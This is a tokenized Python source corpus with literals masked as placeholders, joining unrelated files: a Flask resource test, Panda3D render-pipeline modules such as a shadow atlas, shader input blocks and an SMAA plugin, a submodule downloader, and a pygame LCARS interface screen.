<EOL> ] <EOL> } ) <EOL> def test_as_detail ( self ) : <EOL> detail_endpoint = FlTestResource . as_detail ( ) <EOL> flask . request = FakeHttpRequest ( '<STR_LIT:GET>' ) <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> resp = detail_endpoint ( <NUM_LIT:4> ) <EOL> self . assertEqual ( resp . headers [ '<STR_LIT:Content-Type>' ] , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . data . decode ( '<STR_LIT:utf-8>' ) ) , { <EOL> '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } ) <EOL> def test_is_debug ( self ) : <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> self . assertTrue ( self . res . is_debug ( ) ) <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> self . app . debug = False <EOL> self . assertFalse ( self . res . is_debug ( ) ) <EOL> def test_build_response ( self ) : <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> resp = self . res . build_response ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( resp . headers [ '<STR_LIT:Content-Type>' ] , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( resp . data . decode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' ) <EOL> def test_add_url_rules ( self ) : <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> FlTestResource . add_url_rules ( self . app , '<STR_LIT>' ) <EOL> rules = sorted ( [ rule . endpoint for rule in self . app . url_map . iter_rules ( ) ] ) <EOL> self . assertEqual ( len ( rules ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( rules [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rules [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> FlTestResource . add_url_rules ( self . app , '<STR_LIT>' , endpoint_prefix = '<STR_LIT>' ) <EOL> rules = sorted ( [ rule . endpoint for rule in self . app . url_map . iter_rules ( ) ] ) <EOL> self . assertEqual ( len ( rules ) , <NUM_LIT:5> ) <EOL> self . assertEqual ( rules [ <NUM_LIT:3> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rules [ <NUM_LIT:4> ] , '<STR_LIT>' ) </s>
<s> def main ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import basic_container <EOL> class SwiftContainer ( basic_container . BasicContainer ) : <EOL> def __init__ ( self ) : <EOL> super ( self . __class__ , self ) . __init__ ( ) <EOL> self . image = "<STR_LIT>" <EOL> self . command = "<STR_LIT>" <EOL> self . file_extension = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> from panda3d . core import CardMaker , Vec2 , GraphicsWindow <EOL> from rpcore . rpobject import RPObject <EOL> from rpcore . globals import Globals <EOL> from rpcore . loader import RPLoader <EOL> class PixelInspector ( RPObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pipeline ) : <EOL> RPObject . __init__ ( self ) <EOL> self . _pipeline = pipeline <EOL> self . _node = Globals . base . pixel2d . attach_new_node ( "<STR_LIT>" ) <EOL> self . _create_components ( ) <EOL> self . hide ( ) <EOL> def _create_components ( self ) : <EOL> """<STR_LIT>""" <EOL> card_maker = CardMaker ( "<STR_LIT>" ) <EOL> card_maker . set_frame ( - <NUM_LIT:200> , <NUM_LIT:200> , - <NUM_LIT> , <NUM_LIT> ) <EOL> self . _zoomer = self . _node . attach_new_node ( card_maker . generate ( ) ) <EOL> Globals . base . taskMgr . doMethodLater ( <EOL> <NUM_LIT:1.0> , self . _late_init , "<STR_LIT>" ) <EOL> Globals . base . accept ( "<STR_LIT:q>" , self . show ) <EOL> Globals . base . accept ( "<STR_LIT>" , self . hide ) <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _node . show ( ) <EOL> def hide ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _node . hide ( ) <EOL> def _late_init ( self , task ) : <EOL> """<STR_LIT>""" <EOL> scene_tex = self . _pipeline . stage_mgr . pipes [ "<STR_LIT>" ] <EOL> self . _zoomer . set_shader ( RPLoader . load_shader ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) ) <EOL> self . _zoomer . set_shader_input ( "<STR_LIT>" , scene_tex ) <EOL> return task . done <EOL> def update ( self ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( Globals . base . win , GraphicsWindow ) : <EOL> mouse = Globals . base . win . get_pointer ( <NUM_LIT:0> ) <EOL> if mouse . get_in_window ( ) : <EOL> pos = mouse . get_x ( ) , <NUM_LIT:1> , - mouse . get_y ( ) <EOL> rel_mouse_pos = Vec2 ( mouse . get_x ( ) , Globals . native_resolution . y - mouse . get_y ( ) ) <EOL> self . _node . set_pos ( pos ) <EOL> self . _zoomer . set_shader_input ( "<STR_LIT>" , rel_mouse_pos ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from rplibs . six . moves import range <EOL> from panda3d . core import LVecBase4i , LVecBase4 <EOL> class ShadowAtlas ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , size , tile_size = <NUM_LIT:32> ) : <EOL> self . _size = size <EOL> self . _tile_size = tile_size <EOL> self . _num_used_tiles = <NUM_LIT:0> <EOL> self . init_tiles ( ) <EOL> def init_tiles ( self ) : <EOL> self . _num_tiles = self . _size // self . _tile_size <EOL> def row ( ) : <EOL> return [ False for i in range ( self . _num_tiles ) ] <EOL> self . _flags = [ row ( ) for j in range ( self . _num_tiles ) ] <EOL> def get_num_used_tiles ( self ) : <EOL> return self . _num_used_tiles <EOL> num_used_tiles = property ( get_num_used_tiles ) <EOL> def get_coverage ( self ) : <EOL> return self . _num_used_tiles / float ( self . _num_tiles ** <NUM_LIT:2> ) <EOL> coverage = property ( get_coverage ) <EOL> def reserve_region ( self , x , y , w , h ) : <EOL> self . _num_used_tiles += w * h <EOL> for x_offset in range ( w ) : <EOL> for y_offset in range ( h ) : <EOL> self . _flags [ x + x_offset ] [ y + y_offset ] = True <EOL> def find_and_reserve_region ( self , tile_width , tile_height ) : <EOL> for x in range ( self . _num_tiles - tile_height + <NUM_LIT:1> ) : <EOL> for y in range ( self . _num_tiles - tile_width + <NUM_LIT:1> ) : <EOL> if self . region_is_free ( x , y , tile_width , tile_height ) : <EOL> self . reserve_region ( x , y , tile_width , tile_height ) <EOL> return LVecBase4i ( x , y , tile_width , tile_height ) <EOL> print ( "<STR_LIT>" , tile_width , "<STR_LIT:x>" , tile_height ) <EOL> return LVecBase4i ( - <NUM_LIT:1> ) <EOL> def free_region ( self , region ) : <EOL> self . _num_used_tiles -= region . z * region . w <EOL> for x in range ( region . z ) : <EOL> for y in range ( region . w ) : <EOL> self . _flags [ region . x + x ] [ region . y + y ] = False <EOL> def get_tile_size ( self ) : <EOL> return self . _tile_size <EOL> def region_is_free ( self , x , y , w , h ) : <EOL> for x_offset in range ( w ) : <EOL> for y_offset in range ( h ) : <EOL> if self . _flags [ x + x_offset ] [ y + y_offset ] : <EOL> return False <EOL> return True <EOL> def get_required_tiles ( self , resolution ) : <EOL> if resolution % self . _tile_size != <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> return resolution // self . _tile_size <EOL> def region_to_uv ( self , region ) : <EOL> flt = LVecBase4 ( region . x , region . y , region . z , region . w ) <EOL> return flt * ( self . _tile_size / self . _size ) </s>
<s> """<STR_LIT>""" <EOL> from rplibs . six import iteritems <EOL> from panda3d . core import PTAFloat , PTALVecBase3f , PTALMatrix4f , PTALVecBase2f <EOL> from panda3d . core import PTALVecBase4f , PTALMatrix3f , PTAInt , TypeRegistry , PTALVecBase2i <EOL> from rpcore . rpobject import RPObject <EOL> class SimpleInputBlock ( RPObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> RPObject . __init__ ( self ) <EOL> self . inputs = { } <EOL> self . name = name <EOL> def add_input ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> self . inputs [ name ] = value <EOL> def bind_to ( self , target ) : <EOL> """<STR_LIT>""" <EOL> for key , val in iteritems ( self . inputs ) : <EOL> target . set_shader_input ( self . name + "<STR_LIT:.>" + key , val ) <EOL> class GroupedInputBlock ( RPObject ) : <EOL> """<STR_LIT>""" <EOL> UBO_BINDING_INDEX = <NUM_LIT:0> <EOL> PTA_MAPPINGS = { <EOL> PTAInt : "<STR_LIT:int>" , <EOL> PTAFloat : "<STR_LIT:float>" , <EOL> PTALVecBase2f : "<STR_LIT>" , <EOL> PTALVecBase2i : "<STR_LIT>" , <EOL> PTALVecBase3f : "<STR_LIT>" , <EOL> PTALVecBase4f : "<STR_LIT>" , <EOL> PTALMatrix3f : "<STR_LIT>" , <EOL> PTALMatrix4f : "<STR_LIT>" , <EOL> } <EOL> def __init__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> RPObject . __init__ ( self ) <EOL> self . ptas = { } <EOL> self . name = name <EOL> self . use_ubo = bool ( TypeRegistry . ptr ( ) . find_type ( "<STR_LIT>" ) ) <EOL> self . bind_id = GroupedInputBlock . UBO_BINDING_INDEX <EOL> GroupedInputBlock . UBO_BINDING_INDEX += <NUM_LIT:1> <EOL> if self . bind_id == <NUM_LIT:0> : <EOL> self . debug ( "<STR_LIT>" , self . use_ubo ) <EOL> def register_pta ( self , name , input_type ) : <EOL> """<STR_LIT>""" <EOL> self . ptas [ name ] = self . glsl_type_to_pta ( input_type ) . empty_array ( <NUM_LIT:1> ) <EOL> def pta_to_glsl_type ( self , pta_handle ) : <EOL> """<STR_LIT>""" <EOL> for pta_type , glsl_type in iteritems ( GroupedInputBlock . PTA_MAPPINGS ) : <EOL> if isinstance ( pta_handle , pta_type ) : <EOL> return glsl_type <EOL> self . error ( "<STR_LIT>" , pta_handle ) <EOL> def glsl_type_to_pta ( self , glsl_type ) : <EOL> """<STR_LIT>""" <EOL> for key , val in iteritems ( GroupedInputBlock . PTA_MAPPINGS ) : <EOL> if val == glsl_type : <EOL> return key <EOL> self . error ( "<STR_LIT>" , glsl_type ) <EOL> def bind_to ( self , target ) : <EOL> """<STR_LIT>""" <EOL> for pta_name , pta_handle in iteritems ( self . ptas ) : <EOL> if self . use_ubo : <EOL> target . set_shader_input ( self . name + "<STR_LIT>" + pta_name , pta_handle ) <EOL> else : <EOL> target . set_shader_input ( self . name + "<STR_LIT:.>" + pta_name , pta_handle ) <EOL> def update_input ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> self . ptas [ name ] [ <NUM_LIT:0> ] = value <EOL> def get_input ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . ptas [ name ] [ <NUM_LIT:0> ] <EOL> def generate_shader_code ( self ) : <EOL> """<STR_LIT>""" <EOL> content = "<STR_LIT>" <EOL> content += "<STR_LIT>" <EOL> content += "<STR_LIT>" <EOL> structs = { } <EOL> inputs = [ ] <EOL> for input_name , handle in iteritems ( self . ptas ) : <EOL> parts = input_name . split ( "<STR_LIT:.>" ) <EOL> if len ( parts ) == <NUM_LIT:1> : <EOL> inputs . append ( self . pta_to_glsl_type ( handle ) + "<STR_LIT:U+0020>" + input_name + "<STR_LIT:;>" ) <EOL> elif len ( parts ) == <NUM_LIT:2> : <EOL> struct_name = parts [ <NUM_LIT:0> ] <EOL> actual_input_name = parts [ <NUM_LIT:1> ] <EOL> if struct_name in structs : <EOL> structs [ struct_name ] . append ( <EOL> self . pta_to_glsl_type ( handle ) + "<STR_LIT:U+0020>" + actual_input_name + "<STR_LIT:;>" ) <EOL> else : <EOL> inputs . append ( struct_name + "<STR_LIT>" + struct_name + "<STR_LIT:;>" ) <EOL> structs [ struct_name ] = [ <EOL> self . pta_to_glsl_type ( handle ) + "<STR_LIT:U+0020>" + actual_input_name + "<STR_LIT:;>" <EOL> ] <EOL> else : <EOL> self . warn ( "<STR_LIT>" , input_name ) <EOL> for struct_name , members in iteritems ( structs ) : <EOL> content += "<STR_LIT>" + struct_name + "<STR_LIT>" <EOL> for member in members : <EOL> content += "<STR_LIT:U+0020>" * <NUM_LIT:4> + member + "<STR_LIT:\n>" <EOL> content += "<STR_LIT>" <EOL> if len ( inputs ) < <NUM_LIT:1> : <EOL> self . debug ( "<STR_LIT>" , self . name ) <EOL> else : <EOL> if self . use_ubo : <EOL> content += "<STR_LIT>" . format ( <EOL> self . bind_id , self . name ) <EOL> for ipt in inputs : <EOL> content += "<STR_LIT:U+0020>" * <NUM_LIT:4> + ipt + "<STR_LIT:\n>" <EOL> content += "<STR_LIT>" + self . name + "<STR_LIT>" <EOL> else : <EOL> content += "<STR_LIT>" <EOL> for ipt in inputs : <EOL> content += "<STR_LIT:U+0020>" * <NUM_LIT:4> + ipt + "<STR_LIT:\n>" <EOL> content += "<STR_LIT>" + self . name + "<STR_LIT>" <EOL> content += "<STR_LIT:\n>" <EOL> return content </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from rplibs . six . moves import range <EOL> from rplibs . six import itervalues <EOL> from panda3d . core import Camera , PerspectiveLens , Vec4 , Vec3 , PTAInt <EOL> from rpcore . globals import Globals <EOL> from rpcore . image import Image <EOL> from rpcore . render_stage import RenderStage <EOL> class EnvironmentCaptureStage ( RenderStage ) : <EOL> """<STR_LIT>""" <EOL> required_inputs = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> required_pipes = [ ] <EOL> def __init__ ( self , pipeline ) : <EOL> RenderStage . __init__ ( self , pipeline ) <EOL> self . resolution = <NUM_LIT> <EOL> self . diffuse_resolution = <NUM_LIT:4> <EOL> self . regions = [ ] <EOL> self . cameras = [ ] <EOL> self . rig_node = Globals . render . attach_new_node ( "<STR_LIT>" ) <EOL> self . pta_index = PTAInt . empty_array ( <NUM_LIT:1> ) <EOL> self . storage_tex = None <EOL> self . storage_tex_diffuse = None <EOL> def create ( self ) : <EOL> self . target = self . create_target ( "<STR_LIT>" ) <EOL> self . target . size = self . resolution * <NUM_LIT:6> , self . resolution <EOL> self . target . add_depth_attachment ( bits = <NUM_LIT:16> ) <EOL> self . target . add_color_attachment ( bits = <NUM_LIT:16> , alpha = True ) <EOL> self . target . prepare_render ( None ) <EOL> internal_buffer = self . target . internal_buffer <EOL> internal_buffer . remove_all_display_regions ( ) <EOL> internal_buffer . disable_clears ( ) <EOL> internal_buffer . get_overlay_display_region ( ) . disable_clears ( ) <EOL> self . _setup_camera_rig ( ) <EOL> self . _create_store_targets ( ) <EOL> self . _create_filter_targets ( ) <EOL> def _setup_camera_rig ( self ) : <EOL> """<STR_LIT>""" <EOL> directions = ( Vec3 ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , Vec3 ( - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , Vec3 ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> Vec3 ( <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:0> ) , Vec3 ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , Vec3 ( <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> ) ) <EOL> for i in range ( <NUM_LIT:6> ) : <EOL> region = self . target . internal_buffer . make_display_region ( <EOL> i / <NUM_LIT:6> , i / <NUM_LIT:6> + <NUM_LIT:1> / <NUM_LIT:6> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> region . set_sort ( <NUM_LIT> + i ) <EOL> region . set_active ( True ) <EOL> region . disable_clears ( ) <EOL> region . set_clear_depth_active ( True ) <EOL> region . set_clear_depth ( <NUM_LIT:1.0> ) <EOL> region . set_clear_color_active ( True ) <EOL> region . set_clear_color ( Vec4 ( <NUM_LIT:0> ) ) <EOL> lens = PerspectiveLens ( ) <EOL> lens . set_fov ( <NUM_LIT> ) <EOL> lens . set_near_far ( <NUM_LIT> , <NUM_LIT:1.0> ) <EOL> camera = Camera ( "<STR_LIT>" + str ( i ) , lens ) <EOL> camera_np = self . rig_node . attach_new_node ( camera ) <EOL> camera_np . look_at ( camera_np , directions [ i ] ) <EOL> region . set_camera ( camera_np ) <EOL> self . regions . append ( region ) <EOL> self . cameras . append ( camera_np ) <EOL> self . cameras [ <NUM_LIT:0> ] . set_r ( <NUM_LIT> ) <EOL> self . cameras [ <NUM_LIT:1> ] . set_r ( - <NUM_LIT> ) <EOL> self . cameras [ <NUM_LIT:3> ] . set_r ( <NUM_LIT> ) <EOL> self . cameras [ <NUM_LIT:5> ] . set_r ( <NUM_LIT> ) <EOL> for camera_np in self . cameras : <EOL> self . _pipeline . tag_mgr . register_camera ( "<STR_LIT>" , camera_np . node ( ) ) <EOL> def _create_store_targets ( self ) : <EOL> """<STR_LIT>""" <EOL> self . target_store = self . create_target ( "<STR_LIT>" ) <EOL> self . target_store . size = self . resolution * <NUM_LIT:6> , self . resolution <EOL> self . target_store . prepare_buffer ( ) <EOL> self . target_store . set_shader_input ( "<STR_LIT>" , self . target . color_tex ) <EOL> self . target_store . set_shader_input ( "<STR_LIT>" , self . storage_tex ) <EOL> self . target_store . set_shader_input ( "<STR_LIT>" , self . pta_index ) <EOL> self . temporary_diffuse_map = Image . create_cube ( "<STR_LIT>" , self . resolution , "<STR_LIT>" ) <EOL> self . target_store_diff = self . create_target ( "<STR_LIT>" ) <EOL> self . target_store_diff . size = self . resolution * <NUM_LIT:6> , self . resolution <EOL> self . target_store_diff . prepare_buffer ( ) <EOL> self . target_store_diff . set_shader_input ( "<STR_LIT>" , self . target . color_tex ) <EOL> self . target_store_diff . set_shader_input ( "<STR_LIT>" , self . temporary_diffuse_map ) <EOL> self . target_store_diff . set_shader_input ( "<STR_LIT>" , self . pta_index ) <EOL> def _create_filter_targets ( self ) : <EOL> """<STR_LIT>""" <EOL> self . filter_targets = [ ] <EOL> mip = <NUM_LIT:0> <EOL> size = self . resolution <EOL> while size > <NUM_LIT:1> : <EOL> size = size // <NUM_LIT:2> <EOL> mip += <NUM_LIT:1> <EOL> target = self . create_target ( "<STR_LIT>" . format ( mip , size ) ) <EOL> target . size = size * <NUM_LIT:6> , size <EOL> target . prepare_buffer ( ) <EOL> target . set_shader_input ( "<STR_LIT>" , self . pta_index ) <EOL> target . set_shader_input ( "<STR_LIT>" , mip ) <EOL> target . set_shader_input ( "<STR_LIT>" , self . storage_tex ) <EOL> target . set_shader_input ( "<STR_LIT>" , self . storage_tex , False , True , - <NUM_LIT:1> , mip , <NUM_LIT:0> ) <EOL> self . filter_targets . append ( target ) <EOL> self . filter_diffuse_target = self . create_target ( "<STR_LIT>" ) <EOL> self . filter_diffuse_target . size = self . diffuse_resolution * <NUM_LIT:6> , self . diffuse_resolution <EOL> self . filter_diffuse_target . prepare_buffer ( ) <EOL> self . filter_diffuse_target . set_shader_input ( "<STR_LIT>" , self . temporary_diffuse_map ) <EOL> self . filter_diffuse_target . set_shader_input ( "<STR_LIT>" , self . storage_tex_diffuse ) <EOL> self . filter_diffuse_target . set_shader_input ( "<STR_LIT>" , self . pta_index ) <EOL> def set_probe ( self , probe ) : <EOL> self . rig_node . set_mat ( probe . matrix ) <EOL> self . pta_index [ <NUM_LIT:0> ] = probe . index <EOL> def update ( self ) : <EOL> for target in itervalues ( self . _targets ) : <EOL> target . active = False <EOL> for i in range ( <NUM_LIT:6> ) : <EOL> if self . _pipeline . task_scheduler . is_scheduled ( "<STR_LIT>" + str ( i ) ) : <EOL> self . regions [ i ] . set_active ( True ) <EOL> if self . _pipeline . task_scheduler . is_scheduled ( "<STR_LIT>" ) : <EOL> self . target_store . active = True <EOL> self . target_store_diff . active = True <EOL> self . filter_diffuse_target . active = True <EOL> for target in self . filter_targets : <EOL> target . active = True <EOL> def set_shader_input ( self , * args ) : <EOL> Globals . render . set_shader_input ( * args ) <EOL> def reload_shaders ( self ) : <EOL> self . target_store . shader = self . load_plugin_shader ( <EOL> "<STR_LIT>" ) <EOL> self . target_store_diff . shader = self . load_plugin_shader ( <EOL> "<STR_LIT>" ) <EOL> self . filter_diffuse_target . shader = self . load_plugin_shader ( <EOL> "<STR_LIT>" ) <EOL> for i , target in enumerate ( self . filter_targets ) : <EOL> target . shader = self . load_plugin_shader ( "<STR_LIT>" . format ( i ) ) </s>
<s> """<STR_LIT>""" <EOL> from panda3d . core import SamplerState <EOL> from rpcore . globals import Globals <EOL> from rpcore . loader import RPLoader <EOL> from rpcore . pluginbase . base_plugin import BasePlugin <EOL> from . smaa_stage import SMAAStage <EOL> from . jitters import JITTERS <EOL> class Plugin ( BasePlugin ) : <EOL> name = "<STR_LIT>" <EOL> author = "<STR_LIT>" <EOL> description = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> version = "<STR_LIT>" <EOL> def on_stage_setup ( self ) : <EOL> if self . get_setting ( "<STR_LIT>" ) : <EOL> self . _compute_jitters ( ) <EOL> self . _smaa_stage = self . create_stage ( SMAAStage ) <EOL> self . _smaa_stage . use_reprojection = self . get_setting ( "<STR_LIT>" ) <EOL> self . _load_textures ( ) <EOL> def on_pre_render_update ( self ) : <EOL> if self . get_setting ( "<STR_LIT>" ) : <EOL> jitter_scale = self . get_setting ( "<STR_LIT>" ) <EOL> jitter = self . _jitters [ self . _jitter_index ] <EOL> jitter = jitter [ <NUM_LIT:0> ] * jitter_scale , jitter [ <NUM_LIT:1> ] * jitter_scale <EOL> Globals . base . camLens . set_film_offset ( jitter ) <EOL> self . _smaa_stage . set_jitter_index ( self . _jitter_index ) <EOL> self . _jitter_index += <NUM_LIT:1> <EOL> if self . _jitter_index >= len ( self . _jitters ) : <EOL> self . _jitter_index = <NUM_LIT:0> <EOL> def _compute_jitters ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _jitters = [ ] <EOL> self . _jitter_index = <NUM_LIT:0> <EOL> scale = <NUM_LIT:1.0> / float ( Globals . native_resolution . x ) <EOL> for x , y in JITTERS [ self . get_setting ( "<STR_LIT>" ) ] : <EOL> jitter_x = ( x * <NUM_LIT:2> - <NUM_LIT:1> ) * scale * <NUM_LIT:0.5> <EOL> jitter_y = ( y * <NUM_LIT:2> - <NUM_LIT:1> ) * scale * <NUM_LIT:0.5> <EOL> self . _jitters . append ( ( jitter_x , jitter_y ) ) <EOL> @ property <EOL> def history_length ( self ) : <EOL> if self . get_setting ( "<STR_LIT>" ) : <EOL> return len ( self . _jitters ) <EOL> return <NUM_LIT:1> <EOL> def update_jitter_pattern ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _compute_jitters ( ) <EOL> def _load_textures ( self ) : <EOL> """<STR_LIT>""" <EOL> search_tex = RPLoader . load_texture ( self . get_resource ( "<STR_LIT>" ) ) <EOL> area_tex = RPLoader . load_texture ( self . get_resource ( "<STR_LIT>" ) ) <EOL> for tex in [ search_tex , area_tex ] : <EOL> tex . set_minfilter ( SamplerState . FT_linear ) <EOL> tex . set_magfilter ( SamplerState . FT_linear ) <EOL> tex . set_wrap_u ( SamplerState . WM_clamp ) <EOL> tex . set_wrap_v ( SamplerState . WM_clamp ) <EOL> self . _smaa_stage . area_tex = area_tex <EOL> self . _smaa_stage . search_tex = search_tex </s>
<s> """<STR_LIT>""" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import os <EOL> import sys <EOL> from os . path import dirname , realpath , isfile <EOL> files_to_ignore = "<STR_LIT>" . split ( ) <EOL> current_dir = dirname ( realpath ( __file__ ) ) <EOL> os . chdir ( current_dir ) <EOL> sys . path . insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> sys . path . insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> from submodule_downloader import download_submodule <EOL> download_submodule ( "<STR_LIT>" , "<STR_LIT>" , current_dir , files_to_ignore ) <EOL> with open ( "<STR_LIT>" , "<STR_LIT:w>" ) as handle : <EOL> handle . write ( "<STR_LIT>" ) <EOL> if isfile ( "<STR_LIT>" ) : <EOL> os . remove ( "<STR_LIT>" ) <EOL> os . rename ( "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> from datetime import datetime <EOL> import pygame <EOL> from pygame . mixer import Sound <EOL> from ui import colours <EOL> from ui . widgets . background import LcarsBackgroundImage , LcarsImage <EOL> from ui . widgets . gifimage import LcarsGifImage <EOL> from ui . widgets . lcars_widgets import LcarsText , LcarsButton <EOL> from ui . widgets . screen import LcarsScreen <EOL> from ui . widgets . sprite import LcarsMoveToMouse <EOL> class ScreenMain ( LcarsScreen ) : <EOL> def setup ( self , all_sprites ) : <EOL> all_sprites . add ( LcarsBackgroundImage ( "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:0> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT:11> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . ORANGE , ( <NUM_LIT:0> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT:2> ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . WHITE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) , <EOL> layer = <NUM_LIT:3> ) <EOL> all_sprites . add ( LcarsText ( colours . BLUE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) , <EOL> layer = <NUM_LIT:3> ) <EOL> all_sprites . add ( LcarsText ( colours . BLUE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) , <EOL> layer = <NUM_LIT:3> ) <EOL> all_sprites . add ( LcarsText ( colours . BLUE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) , <EOL> layer = <NUM_LIT:3> ) <EOL> self . info_text = all_sprites . get_sprites_from_layer ( <NUM_LIT:3> ) <EOL> self . stardate = LcarsText ( colours . BLUE , ( <NUM_LIT:12> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) <EOL> self . lastClockUpdate = <NUM_LIT:0> <EOL> all_sprites . add ( self . stardate , layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsButton ( colours . RED_BROWN , ( <NUM_LIT:6> , <NUM_LIT> ) , "<STR_LIT>" , self . logoutHandler ) , <EOL> layer = <NUM_LIT:4> ) <EOL> all_sprites . add ( LcarsButton ( colours . BEIGE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , self . sensorsHandler ) , <EOL> layer = <NUM_LIT:4> ) <EOL> all_sprites . add ( LcarsButton ( colours . PURPLE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , self . gaugesHandler ) , <EOL> layer = <NUM_LIT:4> ) <EOL> all_sprites . add ( LcarsButton ( colours . PEACH , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , self . weatherHandler ) , <EOL> layer = <NUM_LIT:4> ) <EOL> all_sprites . add ( LcarsGifImage ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT:100> ) , layer = <NUM_LIT:1> ) <EOL> self . sensor_gadget = LcarsGifImage ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT:100> ) <EOL> self . sensor_gadget . visible = False <EOL> all_sprites . add ( self . sensor_gadget , layer = <NUM_LIT:2> ) <EOL> self . dashboard = LcarsImage ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . dashboard . visible = False <EOL> all_sprites . add ( self . dashboard , layer = <NUM_LIT:2> ) <EOL> self . weather = LcarsImage ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . weather . visible = False <EOL> all_sprites . add ( self . weather , layer = <NUM_LIT:2> ) <EOL> self . beep1 = Sound ( "<STR_LIT>" ) <EOL> Sound ( "<STR_LIT>" ) . play ( ) <EOL> def update ( self , screenSurface , fpsClock ) : <EOL> if pygame . time . get_ticks ( ) - self . lastClockUpdate > <NUM_LIT:1000> : <EOL> self . stardate . setText ( "<STR_LIT>" . format ( datetime . now ( ) . strftime ( "<STR_LIT>" ) ) ) <EOL> self . lastClockUpdate = pygame . time . get_ticks ( ) <EOL> LcarsScreen . update ( self , screenSurface , fpsClock ) <EOL> def handleEvents ( self , event , fpsClock ) : <EOL> LcarsScreen . handleEvents ( self , event , fpsClock ) <EOL> if event . type == pygame . MOUSEBUTTONDOWN : <EOL> self . beep1 . play ( ) <EOL> if event . type == pygame . MOUSEBUTTONUP : <EOL> return False <EOL> def hideInfoText ( self ) : <EOL> if self . info_text [ <NUM_LIT:0> ] . visible : <EOL> for sprite in self . info_text : <EOL> sprite . visible = False <EOL> def 